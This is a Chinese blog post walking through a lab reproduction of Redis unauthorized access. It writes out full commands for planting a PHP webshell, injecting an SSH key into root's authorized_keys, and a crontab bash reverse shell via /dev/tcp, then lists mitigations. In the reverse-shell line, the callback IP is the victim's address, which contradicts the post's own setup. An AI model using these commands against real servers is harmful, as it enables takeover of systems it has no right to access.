Redis未授权访问漏洞复现学习

0x00 前言

前段时间看到想复现学习一下,然后就忘了
越临近考试越不想复习
在这里插入图片描述

常见的未授权访问漏洞

Redis 未授权访问漏洞
MongoDB 未授权访问漏洞
Jenkins 未授权访问漏洞
Memcached 未授权访问漏洞
JBOSS未授权访问漏洞
VNC 未授权访问漏洞
Docker 未授权访问漏洞
ZooKeeper 未授权访问漏洞
Rsync 未授权访问漏洞
Atlassian Crowd 未授权访问漏洞
CouchDB 未授权访问漏洞
Elasticsearch 未授权访问漏洞
Hadoop未授权访问漏洞
Jupyter Notebook 未授权访问漏洞

今天先学下redis未授权访问

0x01 redis未授权访问漏洞简介

Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。

攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。

0x02 环境搭建

wget http://download.redis.io/releases/redis-2.8.17.tar.gz

在这里插入图片描述

tar xzvf redis-2.8.17.tar.gz  #解压安装包
cd redis-2.8.17  # 进入redis目录
make #编译

在这里插入图片描述


cd src/ #进入src目录
cp redis-server /usr/bin/
cp redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下(这样启动redis-server和redis-cli就不用每次都进入安装目录了)
cd .. # 返回上一级目录
cp redis.conf /etc/ #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf # 使用/etc/目录下的redis.conf文件中的配置启动redis服务


在这里插入图片描述
服务启动成功!

0x03 漏洞证明

redis-cli -h 靶机IP

在这里插入图片描述
说明没有设置密码认证,存在Redis未授权漏洞

0x04 漏洞利用

Ubuntu:受害主机 192.168.246.130,A
Ubuntu2:攻击主机 192.168.246.131,B
都开启redist服务

redis-server /etc/redis.conf

在这里插入图片描述

一、利用方法一 ——往web物理路径写webshell

1、利用条件
(1)靶机redis未授权,未登录验证
(2)靶机开启web服务,并且知道网站路径,还需要具有文件读写增删改查权限
2.利用过程

config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php phpinfo();?>"
save

在这里插入图片描述
浏览器查看web页面
在这里插入图片描述

利用方法二 ——导入SSH公钥(用私钥登录)

1、在受害者主机A创建目录

mkdir /root/.ssh/ #创建ssh公钥存放目录(靶机是作为ssh服务器使用的)

2、在攻击机B中生成ssh公钥和私钥,密码设置为空(回车两次)

Ubuntu2:ssh-keygen -t rsa

在这里插入图片描述
3、在B中
将生成的公钥保存到hhh.txt
再将hhh.txt写入redis

cd .ssh/ 
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > redistest.txt #将生成的公钥保存到redistest.txt
cat redistest.txt | redis-cli -h 192.168.246.130 -x set redistest #将保存ssh的公钥redistext.txt写入redis

在这里插入图片描述
4、然后登录服务器查看
redis-cli -h 192.168.246.130

config get dir #得到redis备份路径
config set dir /root/.ssh #redis备份路径为ssh公钥存放目录
config set dbfilename authorized_keys #设置上传公钥的备份文件名字为authorized_keys
save

在这里插入图片描述
5、在主机B使用root身份进行ssh免密登录主机A

ssh -i id_rsa root@192.168.246.130

注意一定要root身份,不然就gg了
在这里插入图片描述
在这里插入图片描述
耶✌~~登陆成功

利用方法三 ——利用计划任务执行命令反弹shell

1、利用条件
在redis以root权限运行时可以写crontab来执行命令反弹shell
2、利用过程
先在自己的服务器上监听一个端口

nc -lvnp 7999

再连接redis,写入反弹shell

redis-cli -h 192.168.246.130
config set dir /var/spool/cron
set x "\n* * * * * bash -i >& /dev/tcp/192.168.246.130/7999 0>&1\n"
config set dbfilename root
save

0x05 防范方法

1、禁止远程使用一些高危命令
2、为Redis添加密码验证
我们可以通过修改redis.conf文件来为Redis添加密码验证

requirepass mypassword

3、禁止外网访问 Redis
我们可以通过修改redis.conf文件来使得Redis服务只在当前主机可用

bind 127.0.0.1

4、修改默认端口
5、保证authorized_keys文件的安全

0x06 参考

https://www.cnblogs.com/ECJTUACM-873284962/p/9561993.html
https://xz.aliyun.com/t/6103#toc-6

posted @ 2019-12-20 08:58  吃不胖的ruanruan  阅读(392)  评论(0编辑  收藏  举报